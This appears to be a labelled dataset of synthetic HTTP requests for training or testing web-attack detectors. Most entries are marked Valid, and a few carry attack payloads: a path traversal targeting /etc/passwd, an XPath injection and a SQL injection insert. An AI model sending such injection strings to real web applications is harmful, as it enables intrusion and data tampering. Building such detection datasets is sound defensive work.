X-Forwarded-For: 230.76.2.187
X-Serial-Number: 9140776636485
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47049
Start - Id: 11850
class: Valid
GET /1Y0objectePGwM8/e44/r5/asunhpiseep4eFgnL/Igntrmsqeats/c7u7_gdom/B@KeZ6KQdPconnectOl/71mieastmcoisL/Pyz1wlkiwinnt/mdDdnqtjIBc7.Q/0looTa1intpb/LFVqO5XUOenetcat.gif?Nw=dlqg&eproa=eHwu&l3hGm8pae0er=Tb4 HTTP/1.0
Host: 228.255.249.3:80
Connection: keep-alive
Accept: video/*;q=0.9, application/*, text/*;q=0.7
Accept-Charset: euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: axerci2=6iht1pv8
Client-ip: 18.97.57.49
Cookie: DtIZV2.y=y0lsaef;reE4h=spcsqp;ejowttNa=eSFtH;aotz6rasgoepd=tcTs
Cookie2: $Version="31"
Date: Mon, 20 Dec 04 16:19:40 CET
ETag: "FZwK.YcjjgnIG-@p"
Expect: 100-continue
From: letI@hnH5isut.cz
If-Modified-Since: Sun, 16 Apr 06 09:03:26 UTC
If-Unmodified-Since: Sun, 10 Apr 05 17:04:31 GMT
If-Match: "g-GIX1Nj04..h.GFN0Ax"
If-None-Match: "0Oh2u0F2YOk7rTH"
If-Range: *
Max-Forwards: 8843
MIME-Version: 2.2
Pragma: cirmmt7=es
Proxy-Authorization: Digest nonce
Authorization: Digest username="nmetlet"
Range: -5,8-9019,5352-463
Referer: /imHior/froso/i7tam5a.mdb
TE: chunked,gzip,trailers
Trailer: Date
User-Agent: Mozilla/5.4 (Machintosh; U; PPC Mac OS X 9.7; is-es; rv:8.2.3) Gecko/77273495
UA-CPU: x86
UA-Disp: 032,592,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8781x277
Via: 5.0 www.NiiusH.gif, 3.4 222.254.161.121
Transfer-Encoding: deflate
Upgrade: qeona/2.2, e3aae/0.6
Warning: 315 www.oatloe.css "eSpaaytaurstt" "Thu, 12 Mar 09 20:27:38 UTC"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 3151909596780283547
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11850
Start - Id: 7741
class: Valid
PUT /t2/tnl/rtraohoetprbsx/9s3ncMweao/Kaeiveet7/jGkdBkZmA-/is4eaaiorenubots2b/ndwafEpBtnX6vE8TYjKp/eriUafici3gpnfoh/3uiestirhhwe6rfpeots.gif? HTTP/1.0
Content-Length: 171
Content-Language: rr8d,iboBHvn7,hcaom
Content-Encoding: deflate
Content-Location: /Srrh/NeomEnrt.jsp
Content-MD5: dG5oc21ub2F1enV2TXRlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Jan 09 21:48:46 CET
Last-Modified: Sun, 12 Sep 04 01:02:50 UTC
Host: 249.186.204.28
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aunnye-eao;q=0.2
Cache-Control: only-if-cached
Client-ip: 29.49.164.102
Cookie: sock_stream0k9IbWFg=xnakbt;dcoodafre=aOrkcfnato;8tetbee=430;LB1lN0b=acceptceze;ssWn79ohe=9495211;xomeelcdir=511161658
Cookie2: $Version="079"
Date: Sat, 29 Oct 05 19:11:39 CET
ETag: "@FTxu6bmVJPin-gojJa"
Expect: 100-continue
From: hens@6t6o.org
If-Modified-Since: Sat, 30 Jun 07 02:42:43 UTC
If-Unmodified-Since: Tue, 15 Aug 06 03:59:11 GMT
If-Match: "F-gCH.RA0uIYY1U7"
If-None-Match: *
If-Range: Sat, 02 Feb 08 06:03:35 GMT
Max-Forwards: 7
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: nlWd 2e8avieh=tri7nwl
Authorization: eoutrw tsuei=nnwhoxhe
Range: 176685-
Referer: http://htnruC3.gov/oise91e4.htm
TE: trailers,deflate;q=0.0
Trailer: Date
User-Agent: eudsnge/5.8.3.2.1
UA-CPU: Sparc
UA-Disp: 0857,811,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 109x301
Via: 8.1 www.bis3pzw.htm
Transfer-Encoding: compress
Upgrade: oboir/9.1, tneh/8.0, sslA/3.6, rePhmj/5.9, bsdgN/4.4
Warning: 810 141.222.234.142 "zmnweaewonEakBetbj" "Sat, 23 Jan 10 20:21:52 CET"
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 755834931599886
----: -----------------
~~~~~: ~~~~~~~~~~

svrken=9645&miD9iwr=nEWbdifai&ofNfcwbttruicja=w@iisz4ta/xr&t6yxU=bvar2a&c.4JXxexecscript5Oselectl=2Sno&farDei0nxt=sg+iws4on@s&pqfidd=r0boot.iniv&dziosywd5x=8&onu=0

End - Id: 7741
Start - Id: 46306
class: PathTransversal
GET /ohioewod/kG1FNAwEbm/aHjr7Kg@JhRP7Hzx9jgt/u0LhraEw0lfis/oALD8M5q/eQEoGesmnLlR0SVwZd/t3oU@xzLKjY_phx7D/lB68JlxeTkX/osnlCjriatDshyci/rB-@gqjo/udLIJU19ebYplCYsz/vjBG.mspx?aianroiirfIcg9=%2Fetc%2Fpasswd&and5x6Lb=09378911&tujetstdoin0on4=uCUQ-i&jNIZX7Y=493943&hen=nttssee&geeTr=5rfp&tom8=te7zt&Z5RThz6Q=60510&ajoBa9eroj=%3Bmr%3Brtthknshe&GrmAU.group by7BB=eE8xsbD&ancesugnrv=7409711&8odtuhntaz=ecYheg3tuthtte0lar&2z29zl-epYj=s7w0 HTTP/1.1
Host: 64.118.220.159
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: compress, gzip;q=0.0, identity;q=0.9, compress;q=0.6
Accept-Language: yosbElwa-4t;q=0.2, wdlw-75ahsnya;q=0.5, 9ona1xm-ssrrix;q=0.3, jpswnt-bnseode
Cache-Control: max-age=98097
Client-ip: 16.36.50.179
Cookie: sxHFOU49uW=rcs|childeEh:oa9 ;asgr0rc=ux2n;iR1VS=300;eh8hro8cbl56=1939
Cookie2: $Version="53"
Date: Sun, 08 May 05 17:39:04 UTC
ETag: W/"X6BJrt.UWHlAh@dky"
Expect: 4wuSeahj
From: twei@aedq.de
If-Modified-Since: Wed, 26 Mar 08 12:15:17 CET
If-Unmodified-Since: Mon, 02 Apr 07 22:38:59 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 11 May 09 16:02:32 CET
Max-Forwards: 53
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM SWV0eWl5NXJoSXNUbG9pZXpveW5kclRvb2xiYXlmY2NhYXQ=
Authorization: thxnbk kedS=0knxosl0
Range: 5-,07-2
Referer: /lhte/oo7ro/eapas.doc
TE: deflate,trailers,chunked
Trailer: Expect
User-Agent: Mozilla/3.4 (Machintosh; U; PPC 1.1; 8n-ee; rv:9.3.9) Gecko/65430538
UA-CPU: Sparc
UA-Disp: 609,9430,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: FTP/3.3 167.156.209.69:1692, FTP/7.8 200.194.41.221, HTTP/3.5 www.o1nnp9no.jpeg
Transfer-Encoding: deflate
Upgrade: ses/1.2, oIU6/4.9
Warning: 733 13.150.194.194 "tn9trrrTditsmhmen" "Mon, 28 Nov 05 14:46:45 CET"
X-Forwarded-For: 207.118.108.52
X-Serial-Number: 4859376671430624
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46306
Start - Id: 30586
class: Valid
GET /trebumebro4tn/oPPU5UQ/lo3Ax8/sr/gy8SYAlhy_j0z.bin?aatdsisot4=69291263&vans9tmlao=%7Cn+faee&iradG=re+Eadmin%26ofnee&armely5lvOR=sRoo&thsm6rfgoe6=h%3Aorfrbteos0b&menstEJnhh=telneta2dlpbomaillE3htpassShttp&HwYD@DIJe@=uOx2uvYWrQqt&yps=1i3G HTTP/1.1
Host: 35.94.112.88
Connection: close
Accept: video/quicktime, audio/basic;q=0.9, image/*;q=0.7
Accept-Charset: windows-874;q=0.8, iso-8859-3;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: nD-scsslahi, tI-on;q=0.9, a-55lZ, otsi4-rsp;q=0.8
Cache-Control: min-fresh=46
Client-ip: 123.238.214.167
Cookie: En=T%thaYa0alsfjtvn3syae;etZd5ea=0520031;eesr=0a?cyr1r;wruuhcNac=qysayv
Cookie2: $Version="8"
Date: Sun, 17 Jun 07 02:50:34 UTC
ETag: "mR7n5iqgBAMBtL1K"
Expect: 100-continue
From: cehhmBuy@esgh9bl.de
If-Modified-Since: Mon, 18 Feb 08 18:23:35 CET
If-Unmodified-Since: Sun, 04 Jan 04 17:22:11 UTC
If-Match: "tl1Nlwv8DuKlRgUgamUM"
If-None-Match: *
If-Range: "Dh4m4b--r90VQ1rxe"
Max-Forwards: 262
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: dlri frtoat=ifoee5n
Authorization: Basic bnM2dTp3ZXRyZA==
Range: 802453-
Referer: /fizti/Yaeke.html
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/1.3 (Windows; U; WinNT 1.7; ss-Oh; rv:5.7.4) Gecko/41630453
UA-CPU: 68000
UA-Disp: 436,0901,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 689x0740
Via: 6.3 3.13.195.79:5870, FTP/2.4 66.23.75.229:8
Transfer-Encoding: identity
Upgrade: l8ino/0.2, geoi1/3.9, w1yf/3.0, dNna/4.3
Warning: 981 www.tChen.tiff "enpV8eeRsnbvnineberf" 
X-Forwarded-For: 125.141.116.25
X-Serial-Number: 389571955
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30586
Start - Id: 22781
class: Valid
GET /kZftp5gF/rgaPX30z/tndslan2h9fsrhIileb/gDauySaenOelsdaa2/kM-EzrCvLWInGUA_XX1/4execbIHOwhy8ZZYnE/t-vJsg0f/uxsdoa8TetNMwoaa6tN.png?auE=sstylekinclude%3A%26 HTTP/1.0
Host: 235.128.139.23
Connection: close
Accept: */*
Accept-Charset: hz-gb-2312;q=0.5, windows-1254, gb2312, x-mac-greek;q=0.2
Accept-Encoding: *
Accept-Language: k7-e, Ai-fOoi, 69aa-frEcsti
Cache-Control: min-fresh=6
Client-ip: 179.239.37.65
Cookie: hsn7ttr1stnnae=e81>;tmpBundDac;8Eit=inpwwh&tn ufocSea;XMZjHXWGl32_=erg;rfdrrwEesv8ac=7188829;pNeIreplace0LfxI=ogCeoisihcd;hpn1Br@LphpzuX=5290899
Cookie2: $Version="225"
Date: Wed, 15 Sep 04 17:42:39 CET
ETag: "koXigvcjUzSB2K0yR2"
Expect: A3ioh7yr=n5gecol;lmo0aaqh=amaurO
From: 2sn4@17ermwiU.be
If-Modified-Since: Sat, 29 Oct 05 14:53:59 GMT
If-Unmodified-Since: Sun, 08 Feb 04 05:41:32 CET
If-Match: "nzfkk9fN5lV4ah7iGxWg"
If-None-Match: *
If-Range: *
Max-Forwards: 774
MIME-Version: 7.9
Pragma: n3tu97p='naOg'
Proxy-Authorization: NTLM UlJldHN2aXlpNWlqSGlyOWFpZWVwb29pdGhlbkVlZWVhc3JvYXJhbw==
Authorization: Digest nonce
Range: 34-,77353-25473,-559
Referer: http://Avhs.de/s5r7iss2/Sma5/sami.dll
TE: trailers,deflate,chunked
Trailer: Trailer
User-Agent: Mozilla/0.1 (X11; U; SunOS sun4u 1.4; cr-aU; rv:0.6.5) Gecko/30254980
UA-CPU: 68000
UA-Disp: 9973,4219,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 396x8159
Via: FTP/2.1 www.d9nncrsd.jpeg
Transfer-Encoding: deflate
Upgrade: zuf/1.3, ons/6.0, ctn/4.8
Warning: 509 1.194.23.83 "adqi2nt" "Thu, 27 Apr 06 20:53:34 GMT"
X-Forwarded-For: 147.118.27.36
X-Serial-Number: 058187169230158
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22781
Start - Id: 29034
class: Valid
GET /viya7srihneLmtiyrsse.css?Tgtesuuwo=7Ohasnhmhyr&iTnEete3hpdoet=ovyvcabre8leei&oiam=-body&swe2u=tIijwWx%40EBSK&ijnephreuR=mrsee&eaiostt=tcghLIz&es2dd3e8os2mbtr=a_Y9&nSR.oV19NUk=tnae%7CouEiframe&slekBeto=bInobodyheglhdePn&owsHu=tXj&noey4rctiegW=da%24tiRieYc6r%25o0&ut5alUdaCetd1R8=oeQ8Om%40wbc.m&crrh1aEt=aceeSeTezls&heKuc=ireplaced HTTP/1.1
Host: 113.99.170.66:7
Connection: s6ib9
Accept: */*
Accept-Charset: x-mac-japanese;q=0.4, x-mac-japanese;q=0.8
Accept-Encoding: identity;q=0.7, identity;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 155.37.251.194
Cookie: dalodki=88375981
Cookie2: $Version="28"
Date: Tue, 13 Apr 04 11:49:26 GMT
ETag: W/"8f.b@PKNWlrNy1@y3@"
Expect: 100-continue
From: te6nde@Ieee0ntr7.net
If-Modified-Since: Thu, 01 Jan 09 20:41:44 UTC
If-Unmodified-Since: Tue, 18 Jan 05 12:14:30 GMT
If-Match: "mtxuZu2lCn0JRrU"
If-None-Match: *
If-Range: "C843Y8tl.iE0XBU"
Max-Forwards: 3
MIME-Version: 2.4
Pragma: e4hm4hdk=k
Proxy-Authorization: Basic OTdVdGxsOnVzcmxGZA==
Authorization: thstsa nciov3aa=n53wh
Range: 3-,5985-7558,753-
Referer: /tfta/sihh9en/eathgga/Xluy.asmx
TE: chunked;q=0.8,chunked
Trailer: Max-Forwards
User-Agent: lBLxmpYi http://www.ghsucai.biz
UA-CPU: x86
UA-Disp: 6183,441,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 694x8428
Via: HTTP/3.3 56.45.24.26, 2.9 www.srhionm.html
Transfer-Encoding: gzip
Upgrade: erJF/7.0, 5yR/2.8, dpedX/3.1
Warning: 283 109.33.138.133 "d1nhnqa46e" "Sun, 22 Jan 06 23:16:36 CET"
X-Forwarded-For: 251.84.212.195
X-Serial-Number: 1881707
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29034
Start - Id: 18784
class: Valid
GET /uoceiFoariaowdeeqnie/c-/asktfb/qlX.msf?Ni=tnetmpa%3DehomIzyre+ HTTP/1.0
Host: 86.68.231.30:21
Connection: redeoi
Accept: application/x-tar;q=0.2, text/*, image/*;q=0.8
Accept-Charset: ks_c_5601-1987;q=0.4, us-ascii
Accept-Encoding: *
Accept-Language: i-p;q=0.5, naetsbt6-iplu2;q=0.6
Cache-Control: de='Mlnslrx'
Client-ip: 61.253.90.162
Cookie: leoRdplaasdEcd=ho
Cookie2: $Version="85"
Date: Tue, 22 Sep 09 13:15:45 UTC
ETag: W/"4yJUvdwQHHTL.HQntJ"
Expect: DrnnfC=othwa
From: 1edeiie1@pdcnous.ch
If-Modified-Since: Sun, 22 Aug 04 03:12:46 GMT
If-Unmodified-Since: Sun, 09 Oct 05 10:49:02 GMT
If-Match: *
If-None-Match: *
If-Range: "tkbWGeerseq5GnRYX"
Max-Forwards: 9
MIME-Version: 5.2
Pragma: cdeas='eh2eitj'
Proxy-Authorization: lzrr ceMeA=gsmut
Authorization: aAIt llaii=iard6
Range: 23-
Referer: http://aeidee.com/zyndmw/ttnFo0/st6negs.swf
TE: gzip,gzip
Trailer: Trailer
User-Agent: esF9K8vi http://www.einnne.st
UA-CPU: Sparc
UA-Disp: 0379,370,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 017x6703
Via: 1.9 154.16.160.157:71091
Transfer-Encoding: compress
Upgrade: T21ri/2.9, nerlj/2.8, otr/7.9
Warning: 003 www.Ooy6hd.tiff "oonlbt8n4cweMttbL" 
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 57174297786
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18784
Start - Id: 49581
class: XPathInjection
GET /aQS4Wj1JZ8zz9.cidBg9/oAraphTc/tg_eBQRqCY78NkG/u7hfOB@WGsCf/XbwinntJr5/w1Ldljmen7lanZhbqrt.gif?ohaw=dCw2&JUd11MDTQD@4=o9au%27%5D++++%7C++P+++%7C+++%2F%2Fuser%5B++++name%2Ftext%28++++%29+++%3D%27rac&ftpEkn1=040&QfqAitot=3lOttd&hYputT=8&uT=mo HTTP/1.0
Host: 87.121.169.57
Connection: a2rr
Accept: application/rtf;q=0.9, text/*
Accept-Charset: iso-8859-2
Accept-Encoding: identity, gzip, identity, deflate
Accept-Language: zaeieuu-FeSerna, o-oWCac;q=0.3, es-fe9, OeNrnrs-pvhaQa
Cache-Control: E6oLeyc='9uN2'
Client-ip: 231.234.74.67
Cookie: ie=ett4;eaosoen1oslcoe=T%u7;jus=3jdcOr5sb/\e;SeaftaR=echocgo~m;biEar5g5rle=7&rnesoe;iAholi=068877
Cookie2: $Version="84"
Date: Thu, 04 Nov 04 03:05:06 CET
ETag: ".TlCpyEuLRRD7Ffdh"
Expect: cadfTae=6qeeI
From: xAlQbr@oetAt.gov
If-Modified-Since: Mon, 15 Aug 05 22:19:12 UTC
If-Unmodified-Since: Wed, 21 Jul 04 22:38:14 CET
If-Match: "7EX_M0l7Gy5bsV4q8T"
If-None-Match: *
If-Range: Fri, 25 May 07 21:16:44 CET
Max-Forwards: 4
MIME-Version: 6.0
Pragma: goliod='orecootn'
Proxy-Authorization: Digest nonce
Authorization: 0ejre partissh=brdssh
Range: -191,56-,-47911
Referer: /onls/mrae/o8iafif/tkcnaDAt.js
TE: chunked;q=0.7,gzip;q=0.4,trailers
Trailer: If-Unmodified-Since
User-Agent: eehsohhIe/7.5.5.0.1
UA-CPU: PowerPC
UA-Disp: 3990,9142,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2073x766
Via: 5.1 www.tum9k.htm
Transfer-Encoding: lcib
Upgrade: w3tun/4.7, nll2c/3.7, iotwG/2.5, ialro/2.8, zf5q/7.2
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49581
Start - Id: 11852
class: Valid
GET /Osakeu/nJeUEdnWvVTwtcgPUzqs.msf?b0cnhej=66&Aeiejusaltnem5=6&hsaNrdc7rn3e=67261479&Scfa9ctsuC=6455508&jfvarJ=792&mmtoro=v&euenr6nisiOz7f2=ndr8rs%3E%3BEan&NeSe=at0i%3Ahidpsr1ibgsoundi&ieOt8old=o1K5YUx&ahrf26nvla=nd&cbcnsriu=hsAmoro6caoiinr8&dhb7c=Q8hrs2ifheueuLao5&ano4=rXpYqG&5zpofoehlnties=0479 HTTP/1.0
Host: www.3Tot.com
Connection: lu3tpAen
Accept: audio/*;q=0.8
Accept-Charset: gb2312;q=0.9, euc-cn;q=0.1, iso-10646-ucs-2, iso-8859-5;q=0.7, x-mac-korean;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale=77523
Client-ip: 18.97.57.49
Cookie: it=OPanmdholwaAn;xeossd3ohwwods=exec;Kfj4S=1i+;sdstvxOnes6a=haI;moi2uoidyjie=377
Cookie2: $Version="31"
Date: Tue, 06 Jul 04 05:50:12 CET
ETag: "FZwK.YcjjgnIG-@p"
Expect: CsiaipO
From: letI@hnH5isut.cz
If-Modified-Since: Sun, 16 Apr 06 09:03:26 UTC
If-Unmodified-Since: Mon, 09 Jan 06 02:03:41 CET
If-Match: *
If-None-Match: "0Oh2u0F2YOk7rTH"
If-Range: Tue, 01 Feb 05 02:21:41 CET
Max-Forwards: 591
MIME-Version: 7.4
Pragma: mowtze=fa
Proxy-Authorization: Digest nonce
Authorization: Digest username="nmetlet"
Range: -5,8-9019,5352-463
Referer: /9ipxn/tot0da.txt
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/5.8 (Machintosh; U; Mac OS X 6.8; 9o-i5; rv:2.8.5) Gecko/81728117
UA-CPU: x86
UA-Disp: 032,592,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8781x277
Via: Thtola/7.4 237.14.194.146, HTTP/3.3 58.122.164.143, HTTP/1.9 240.229.247.28
Transfer-Encoding: deflate
Upgrade: rrn/5.2, rJrm/9.4, str/0.7
Warning: 315 www.oatloe.css "eSpaaytaurstt" "Thu, 12 Mar 09 20:27:38 UTC"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 3151909596780283547
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11852
Start - Id: 640
class: Valid
GET /8e5Lhaeic/nG5I0ruBi@vYNKq/2l8/ipFMdssbaglhtllpowa/etnIrewetr8aofsn0/elsari/wFXj8WFrInWg/aK/wfpHvmlu/wnag9twneNWaiz8/xdrvcWanonssi/oboEx.msf?emh30zkac6M=ctviDscr&Jh8kno=suy HTTP/1.0
Host: 165.250.207.170
Connection: close
Accept: */*
Accept-Charset: windows-1257;q=0.1
Accept-Encoding: *
Accept-Language: lztmtsrw-yht;q=0.9, see-Nltnncrr, thIjwa-fibEtt1f, o-zsDs3e
Cache-Control: min-fresh=1
Client-ip: 117.71.190.235
Cookie: utpreedesn4=26421;whereIjMiz2=655;copy1_-UKP=n'dh-
Cookie2: $Version="01"
Date: Thu, 12 Aug 04 01:17:31 CET
ETag: W/"IDQFd9QlRPXl8zOYPy"
Expect: h3r9eig
From: ystebe@hnBteRt6v.be
If-Modified-Since: Sun, 07 Mar 04 02:55:38 GMT
If-Unmodified-Since: Fri, 11 Nov 05 01:09:33 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 26 Dec 07 07:48:14 GMT
Max-Forwards: 13
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: NTLM all0bmFoaXVuYWNhYW9yNG8xYXdFbnJ0YXloNXNhT3NyYmFCb2VleXQ=
Authorization: Digest nc=cbBAf31F
Range: -41102,7441-307
Referer: /imTS4n/Tsur/iCet.php
TE: deflate;q=0.5,gzip;q=0.1,deflate
Trailer: If-None-Match
User-Agent: Mozilla/1.6 (X11; U; Unix 5.3; du-vt; rv:3.9.3) Gecko/07820863
UA-CPU: x86
UA-Disp: 2226,321,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1676x432
Via: 4.5 54.21.228.74
Transfer-Encoding: identity
Upgrade: leEya/2.8, m3dun/4.8, eaig/9.5
Warning: 786 www.jw5tieNi.jpg "h22R" 
X-Forwarded-For: 120.114.184.187
X-Serial-Number: 541499677250739
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 640
Start - Id: 30029
class: Valid
GET /rxoey7oiaahcakkb/bodyt/netcatA6Uwp-E6/kU9-7/EhtpassVQQWuwbSSD/rpeustDrtFttair/MncLkIzEr30O/a.rX0iG5jGThk6NC/AehavingofF.css? HTTP/1.0
Host: 218.184.15.30
Connection: keep-alive
Accept: */*
Accept-Charset: big5;q=0.6
Accept-Encoding: *
Accept-Language: brto-aWtu1;q=0.7, deb-ernrv, kcees-lmeer;q=0.6, rfreres-n3iy, teer-tliha;q=0.0
Cache-Control: no-cache
Client-ip: 117.162.71.74
Cookie: qserRpnbvi=locationnew s;Oen84waieo=4jDqg5_G7B@;nksIcreeedfnurk=05;pQIGQkF3IM=w2ZPGGgAw
Cookie2: $Version="72"
Date: Sun, 04 Nov 07 08:31:03 GMT
ETag: W/"bkI2oqvL25qTmOU_h.8W"
Expect: 9hniwaa=4dseoat;eiens=otoBt
From: aeeNsEvt@wbsohnw.st
If-Modified-Since: Mon, 10 Mar 08 12:48:09 GMT
If-Unmodified-Since: Mon, 24 Mar 08 07:12:44 CET
If-Match: "5eWn7Lgw7TSeO_Mk"
If-None-Match: "@HC4xLV1ZPEou3Qnc"
If-Range: "gHCJYJsjouMzCRnai"
Max-Forwards: 39
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://dleeenw.st/eca4lhoc/sIcocHa.exe
Authorization: NTLM bzZydG5sZzBybnplbGVsb2Y3b2VUanNhZW1obXRsaWNzbmNUMGdvc25odW8=
Range: -161,91297-7682
Referer: /nsbhd/lt0ae/vohq9B/mntl0s/lraa.cgi
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: r8ttznpst (6.02w8r; lS8l5AdZ)
UA-CPU: StrongARM
UA-Disp: 618,258,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 8728x633
Via: 2.4 www.sieawieh.tiff:841, 5tstcd/0.3 95.34.223.188
Transfer-Encoding: compress
Upgrade: stuwhh/8.8, atrsr/3.0, Npnw/6.8, tnean/0.9, ldmoas/7.7
Warning: 676 47.243.61.114 "eesebzn4th" "Fri, 17 Jul 09 08:02:56 GMT"
X-Forwarded-For: 123.131.64.169
X-Serial-Number: 2857393
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30029
Start - Id: 42152
class: SqlInjection
GET /d2O208N3UpxVSLG/dnxj_t11B5.shtml?0yieni2mwIryhie=%27%3B++++insert++++into+++ObnTm++++values%28666%2C%27nh%27%2C%27naalkhc%27%2C0xfffff%29&rgeomhdSE9rivpb=6&G0os6aarleS=ire6deza HTTP/1.0
Host: www.EraeWhnbq.biz
Connection: ihnoIm
Accept: image/png;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tscoibu-src;q=0.9, jdjltP-ldysoi, tgofh2o-seshoa, ean-tsp;q=0.1, aId-iidwAo
Cache-Control: min-fresh=903
Client-ip: 117.221.83.105
Cookie: eecirujoAdtfle=a
Cookie2: $Version="6"
Date: Tue, 02 Nov 04 11:14:20 CET
ETag: W/"R.zF5Up0kwBtPzZ-DN7V"
Expect: 2tic
From: yaieolw@dAieet.st
If-Modified-Since: Sun, 29 Jun 08 05:21:08 UTC
If-Unmodified-Since: Mon, 28 Aug 06 18:14:01 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 04 Jan 08 15:13:37 GMT
Max-Forwards: 9
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest realm
Range: 4781-
Referer: /annaeua.aspx
TE: deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/9.7 (compatible; Konqueror/9.0; Linux i386; freexme; flty6t; dRarerri)
UA-CPU: StrongARM
UA-Disp: 2259,521,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3499x504
Via: 4.5 www.homphXe.html, HTTP/5.2 www.oanEato.htm:7
Transfer-Encoding: ktfi
Upgrade: cosqd/4.3
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42152
Start - Id: 30404
class: Valid
GET /shNsLvrDImw/catS1-Y1fW/iI/ongmgeebstaer/rP7KK0bDQdXQFRTX7P/oT/4ec/NDauinoO0o/lodoaja8ntOr/KfJuP/rSatp8.shtml?mcdtrkatnOv=4&cHNzpj=Ttdtehodr3nae&mIrmeoott=ctfMaaaabrirnnce1&1aea=062&temnaw8hfeAznt=rVB3U_&pllhjo=80&jok6icitrs=73140411&5retveueeaoh=9 HTTP/1.0
Host: www.neeeup8chi.com
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 29.42.254.23
Cookie: nml=50208295;peu=2479740944;dLGGbetween9lincludeHy=767122;eoeNmtuqearva=Yeec;okw=pro\
Cookie2: $Version="355"
Date: Tue, 03 Oct 06 10:30:31 CET
ETag: W/".YAqbfmeBNGA0v2lC7"
From: wmReuit@hemuh5.fr
If-Modified-Since: Thu, 25 Dec 08 04:00:40 UTC
If-Unmodified-Since: Sun, 23 Jan 05 16:20:58 GMT
If-Match: "qs6n3PGlYbL618CeQ"
If-None-Match: "23dS9S6oPzt@6ishMnLt"
If-Range: "KphI-GkOxqP8-78t@fu"
Max-Forwards: 265
MIME-Version: 1.9
Pragma: dkfJO='9tReyh'
Authorization: Digest algorithm=lseb
Referer: http://iotL.org/mbeCe/tne1tsth/wsta/b0xl.jpeg
TE: trailers
User-Agent: Mozilla/8.1 (Machintosh; U; PPC Mac OS X 2.0; ry-et; rv:3.5.3) Gecko/77160405
UA-Pixels: 094x400
Transfer-Encoding: identity
Upgrade: hrn/2.4, mTvSe4/1.5, ua6xno/8.1, tssin/5.7, 7yhoei/2.2
X-Serial-Number: 17997505261977757757
----: -------------------------------------------------

null

End - Id: 30404
Start - Id: 32178
class: Valid
GET /cmHwek/eb7yzRUBZlmn6Aw5_r8W.dll? HTTP/1.0
Host: www.dOenAAc.be
Connection: Uhaono
Accept: image/png, audio/x-wav;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.6
Accept-Language: *
Cache-Control: max-stale
Client-ip: 198.247.155.21
Cookie: wa=i9uiLhtaccesuiuo
Cookie2: $Version="770"
Date: Wed, 14 Jan 09 12:09:48 UTC
ETag: W/"1okxnce69WdrEIIq"
Expect: 100-continue
From: Awnhel9h@1h2kcie.be
